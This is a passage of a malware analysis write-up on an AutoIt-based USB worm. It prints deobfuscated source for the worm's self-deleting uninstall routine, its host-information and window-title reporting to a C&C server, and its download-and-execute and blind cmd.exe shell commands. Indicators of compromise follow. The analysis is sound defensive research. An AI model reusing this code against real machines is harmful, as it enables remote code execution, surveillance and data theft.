class="n">$OBJANTIVIRUSPRODUCT</span><span class="o">.</span><span class="n">displayName</span> <span class="kt">Next</span> <span class="kt">If</span> <span class="n">$AVNAME</span> <span class="o">=</span> <span class="kt">False</span> <span class="kt">Then</span> <span class="kt">Return</span> <span class="s">"No-AntiVirus"</span> <span class="kt">Else</span> <span class="kt">Return</span> <span class="n">$AVNAME</span> <span class="kt">EndIf</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's self explanatory, it iterates SecurityCenter entries and returns last anti-virus provider. If an anti-virus not exist, returns <code>No-AntiVirus</code>. Also did you remember <code>No-AntiVirus</code> entry, we found it in static analysis.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Func</span> <span class="kt">XFNYFKEFWEQHZMH</span><span class="p">()</span> <span class="p">;</span> <span class="kt">BrokenUninstall</span><span class="p">()</span> <span class="kt">DataReport</span><span class="p">(</span><span class="s">"MSG0LIONW0 Uninstall !!"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"JavaUpdate"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeUpdate"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"NewJavaInstall"</span><span class="p">)</span> <span class="kt">RegDelete</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeFlash"</span><span class="p">)</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="s">"netsh"</span><span class="p">,</span> <span class="s">"firewall delete allowedprogram "</span> <span class="o">&amp;</span> <span class="kd">@AutoItExe</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="kd">@SW_HIDE</span><span class="p">)</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="kd">@ComSpec</span><span class="p">,</span> <span class="s">"/k ping 0 &amp; del "</span> <span class="o">&amp;</span> <span class="kd">@AutoItExe</span> <span class="o">&amp;</span> <span class="s">" &amp; exit"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="kd">@SW_HIDE</span><span class="p">)</span> <span class="kt">Exit</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>Whoa, did we find a uninstall function in this malware? Cool! <em>However did you not expect it is well working, right?</em> It only deletes the the regedit keys, the malware that placed <code>C:\GoogleChrome\GoogleChrome.exe</code>, removes the firewall exception. And remove itself. The shortcuts and <code>C:\MozillaFirefox</code> still exist and can the malware spread it again.</p> <p>But i liked the way to remove executable, it starts a <code>cmd.exe</code> and <code>ping 0</code> to sleep the malware exits while ping is sending then <code>cmd.exe</code> removes by <code>del @AutoItExe</code> part.</p> <p>Also it's sending <code>MSG0LIONW0 Uninstall !!"</code> message to server.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="n">$ZKXUZCJNQFHAJKU</span> <span class="o">=</span> <span class="mi">4</span> <span class="p">;</span> <span class="n">$counter_to_spread</span> <span class="n">$BJLTKXJDEYWQECD</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">;</span> <span class="n">$counter_to_steal</span> <span class="n">$SSPGCTZBCDDBOHR</span> <span class="o">=</span> <span class="s">""</span> <span class="p">;</span> <span class="n">$last_window_title</span> <span class="kt">While</span> <span class="mi">1</span> </code></pre> </div> <p>We have a bunch of variables and we are going into the main loop.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="n">$counter_to_spread</span> <span class="o">+=</span> <span class="mi">1</span> <span class="kt">If</span> <span class="n">$counter_to_spread</span> <span class="o">=</span> <span class="mi">5</span> <span class="kt">Then</span> <span class="n">$counter_to_spread</span> <span class="o">=</span> <span class="mi">0</span> <span class="kt">RegWriteAndStartupShortcuts</span><span class="p">()</span> <span class="kt">AddMyFolders</span><span class="p">()</span> <span class="kt">EndIf</span> </code></pre> </div> <p>It have basically <code>(++counter_to_spread%5 == 0)</code> condition and triggers the functions to spread removable devices and sure the malware is still persistent.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="n">$EWFVJGZMZAZBQSC</span> <span class="o">=</span> <span class="kt">GetCommandFromCNC</span><span class="p">()</span> <span class="p">;</span> <span class="n">$CNC_command</span> </code></pre> </div> <p>It gets command from C&amp;C to process.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Select</span> <span class="kt">Case</span> <span class="n">$CNC_command</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="kt">Or</span> <span class="n">$TCP_Connection_State</span> <span class="o">=</span> <span class="mi">1</span> <span class="kt">Sleep</span><span class="p">(</span><span class="mi">3000</span><span class="p">)</span> <span class="kt">ResolveAddressAndConnect</span><span class="p">()</span> <span class="kt">DataReport</span><span class="p">(</span><span class="s">"lv0LIONW0"</span> <span class="o">&amp;</span> <span class="n">$Zeus_drive_serial</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="kd">@ComputerName</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="kd">@UserName</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="kd">@OSVersion</span> <span class="o">&amp;</span> <span class="s">" "</span> <span class="o">&amp;</span> <span class="kd">@OSArch</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="nv">$0</span><span class="mi">3</span><span class="n">xUsb</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span> <span class="o">&amp;</span> <span class="kt">AV</span><span class="p">()</span> <span class="o">&amp;</span> <span class="s">"0LIONW0"</span><span class="p">)</span> </code></pre> </div> <p>It checks the status of socket. And if connection not initialized or terminated, it is trying to start connection here and report the computer information. That we found already in static analysis. Also the <code>Sleep</code> call probably to prevent triggering an anti-virus and keep hidden in other network requests.</p> <p>Also it's the only call of <code>ResolveAddressAndConnect</code> function in the malware. The all previous <code>DataReport</code> calls will always fail cause from that.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Case</span> <span class="n">$CNC_command</span> <span class="o">=</span> <span class="s">""</span> <span class="n">$counter_to_steal</span> <span class="o">+=</span> <span class="mi">1</span> <span class="kt">Sleep</span><span class="p">(</span><span class="mi">1000</span><span class="p">)</span> <span class="kt">If</span> <span class="n">$counter_to_steal</span> <span class="o">=</span> <span class="mi">8</span> <span class="kt">Then</span> <span class="n">$counter_to_steal</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">$CALKNAYQNVAYKLR</span> <span class="o">=</span> <span class="kt">WinGetTitle</span><span class="p">(</span><span class="s">""</span><span class="p">)</span> <span class="kt">If</span> <span class="n">$CALKNAYQNVAYKLR</span> <span class="o">&lt;&gt;</span> <span class="n">$last_window_title</span> <span class="kt">Then</span> <span class="kt">DataReport</span><span class="p">(</span><span class="s">"ac0LIONW0"</span> <span class="o">&amp;</span> <span class="n">$CALKNAYQNVAYKLR</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="n">$last_window_title</span> <span class="o">=</span> <span class="n">$CALKNAYQNVAYKLR</span> <span class="n">$CALKNAYQNVAYKLR</span> <span class="o">=</span> <span class="s">""</span> <span class="kt">EndIf</span> </code></pre> </div> <p>If socket connected successfully, it will capture current window title via <code>WinGetTitle("")</code> in every 8 seconds. If the current title is not equal to previous title, it will reported via <code>DataReport</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Case</span> <span class="n">$CNC_command</span> <span class="o">&lt;&gt;</span> <span class="s">""</span> <span class="n">$XOHRZSTRJNJQZYB</span> <span class="o">=</span> <span class="kt">StringSplit</span><span class="p">(</span><span class="n">$CNC_command</span><span class="p">,</span> <span class="s">"0LIONW0"</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="p">;</span> <span class="n">$CNC_command_list</span> </code></pre> </div> <p>If <code>$CNC_command</code> is not equal to <code>""</code>, it tries to split using the delimiter and assign to <code>$CNC_command_list</code>.</p> <blockquote> <p>Note: <code>StringSplit</code> is also using AutoIt 3 Array returning format.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">If</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="kt">Then</span> </code></pre> </div> <p><code>$CNC_command_list</code> size check is too comic. It checks only longer than is it bigger than <code>0</code> or not. However we are already checked it is not empty, so it <strong>always</strong> bigger than <code>0</code>. Also not properly checks size. <code>$CNC_command_list[2]</code> would malware crash if server send faulty data. <em>Never mind, I am too thinking about this malware.</em><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Select</span> <span class="kt">Case</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">"DL"</span> <span class="kt">InetGet</span><span class="p">(</span><span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="kd">@TempDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="se">\"</span><span class="s"> &amp; $CNC_command_list[3], 1) If FileExists(@TempDir &amp; "</span><span class="p">\</span><span class="s">" &amp; $CNC_command_list[3]) Then ShellExecute("</span><span class="n">cmd</span><span class="o">.</span><span class="n">exe</span><span class="s">", "</span><span class="o">/</span><span class="n">c</span> <span class="n">start</span> <span class="o">%</span><span class="n">temp</span><span class="o">%</span><span class="p">\</span><span class="s">" &amp; $CNC_command_list[3], "", "", @SW_HIDE) DataReport("</span><span class="kt">MSG0LIONW0Executed</span> <span class="kt">As</span> <span class="s">" &amp; $CNC_command_list[3]) Else DataReport("</span><span class="kt">MSG0LIONW0Download</span> <span class="kt">ERR</span><span class="s">") EndIf </span></code></pre> </div> <p>It checks first parameter is equal to <code>DL</code>. <code>DL</code> mostly stands for <em>download</em> keyword. And it's explaining what does exactly. It download second parameter to <code>%TEMP%</code> using third parameter as filename.<br> If the file exists in the <code>%TEMP%</code> directory, it tries to run via <code>ShellExecute</code>. And lastly sends information to C&amp;C server about execution state (run or corrupted). Also this mode might be show the malware have a second part which distributed via C&amp;C to keep avoid from anti-virus scans. But we can never able to learn that.</p> <p>Also it is the part of we understand the malware isn't just a basic worm or info-stealer. It can run arbitrary code on infected computer.</p> <p>Probably the syntax is looking like <code>DL0LIONW0$url0LIONW0file_name</code> to trigger that situation.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Case</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">"un"</span> <span class="kt">BrokenUninstall</span><span class="p">()</span> </code></pre> </div> <p>If it gets just <code>un</code> command, it triggers broken uninstaller function. Also you probably guessed the <code>un</code> keyword is just standing <em>uninstall</em>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">Case</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">"cmd"</span> <span class="kt">If</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="s">"cmd.exe"</span><span class="p">,</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="s">""</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="kd">@SW_HIDE</span><span class="p">)</span> <span class="o">=</span> <span class="mi">1</span> <span class="kt">Then</span> <span class="kt">DataReport</span><span class="p">(</span><span class="s">"MSG0LIONW0Executed cmd.exe "</span> <span class="o">&amp;</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="kt">Else</span> <span class="kt">DataReport</span><span class="p">(</span><span class="s">"MSG0LIONW0Execute ERR cmd.exe "</span> <span class="o">&amp;</span> <span class="n">$CNC_command_list</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="kt">EndIf</span> </code></pre> </div> <p>If it gets <code>cmd</code> as first argument, it will try to run the command in <code>cmd.exe</code>, however it not contains <code>/c</code> parameter so commands also needs the parameter to run command with it. Also it not reported output of the command. So it's a blind shell at all. You can run commands however never be sure what worked and what not worked.</p> <p>Probably the syntax is looking like <code>cmd0LIONW0$command</code> to trigger that situation.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code> <span class="kt">EndSelect</span> <span class="kt">EndIf</span> <span class="kt">EndSelect</span> <span class="kt">WEnd</span> </code></pre> </div> <h2> 5. IoC </h2> <h3> 5.1. Network Address </h3> <ul> <li><code>hxxp://googleads[.]publicvm[.]com:224/</code></li> </ul> <h3> 5.2. Dropped Files </h3> <ul> <li><code>X:\MozillaFirefox</code></li> <li><code>X:\MozillaFirefox\GoogleChrome.exe</code></li> <li><code>X:\MozillaFirefox\GoogleChrome.a3x</code></li> <li><code>X:\MozillaFirefox\GoogleChrome.lnk</code></li> <li><code>X:\MozillaFirefox\GoogleUpdate.lnk</code></li> <li><code>X:\MozillaFirefox\WindowsUpdate.lnk</code></li> <li><code>X:\MozillaFirefox\MozillaFirefox.lnk</code></li> <li><code>X:\GoogleChrome</code></li> <li><code>X:\GoogleChrome\GoogleChrome.exe</code></li> <li><code>X:\GoogleChrome\GoogleChrome.a3x</code></li> <li><code>X:\GoogleChrome\GoogleChrome.lnk</code></li> <li><code>X:\GoogleChrome\GoogleUpdate.lnk</code></li> <li><code>X:\GoogleChrome\WindowsUpdate.lnk</code></li> <li><code>X:\GoogleChrome\MozillaFirefox.lnk</code></li> <li><code>X:\$folder_name\$folder_name.lnk</code></li> <li><code>X:\*\My Music.lnk</code></li> <li><code>X:\Documents.lnk</code></li> <li><code>X:\Downloads.lnk</code></li> <li><code>@StartupCommonDir\Google Chrome.lnk</code></li> <li><code>@StartupCommonDir\GoogleUpdate.lnk</code></li> </ul> <h3> 5.3. Regedit </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Key Name</th> <th>Value Name</th> <th>Type</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code></td> <td><code>JavaUpdate</code></td> <td><code>REG_SZ</code></td> <td><code>C:\GoogleChrome\GoogleUpdate.lnk</code></td> </tr> <tr> <td><code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code></td> <td><code>NewJavaInstall</code></td> <td><code>REG_SZ</code></td> <td><code>C:\GoogleChrome\GoogleChrome.exe /AutoIt3ExecuteScript C:\GoogleChrome\GoogleChrome.a3x</code></td> </tr> <tr> <td><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code></td> <td><code>AdopeUpdate</code></td> <td><code>REG_SZ</code></td> <td><code>C:\GoogleChrome\GoogleUpdate.lnk</code></td> </tr> <tr> <td><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code></td> <td><code>AdopeFlash</code></td> <td><code>REG_SZ</code></td> <td><code>C:\GoogleChrome\GoogleChrome.exe /AutoIt3ExecuteScript C:\GoogleChrome\GoogleChrome.a3x</code></td> </tr> </tbody> </table></div> <h3> 5.4. Hashes </h3> <ul> <li> <code>GoogleChrome.a3x</code> <ul> <li><code>md5:504d89bf4cd11c6557126ed1dc3d7504</code></li> <li><code>sha1:bd4ba817d1fde5a936700907e8cf3fdfe539388c</code></li> </ul> </li> </ul> <h2> 6. TL;DR </h2> <ul> <li>The malware is abusing the AutoIt 3 (3.3.8.1) signed executable. And uses compiled AutoIt3 scripts (<code>a3x</code>) to distribute the malware. And since the malware dependent to runtime, uses Windows shortcuts that triggers malware.</li> <li>It distributed by removable drives. And infect victim computer via malicious shortcut files. Any execution of shortcut files will trigger infection chain.</li> <li>It can download any executable and run any arbitrary command via C&amp;C server.</li> <li>It reports username, desktop name, Windows version, cpu arch, drive serial, antivirus vendor before every C&amp;C connections.</li> <li>It adds startup triggers (via shortcuts and regedit values).</li> <li>It changes firewall settings to allow itself.</li> <li>It sends active windows titles in every 8 seconds.</li> </ul> security reverse malware analysis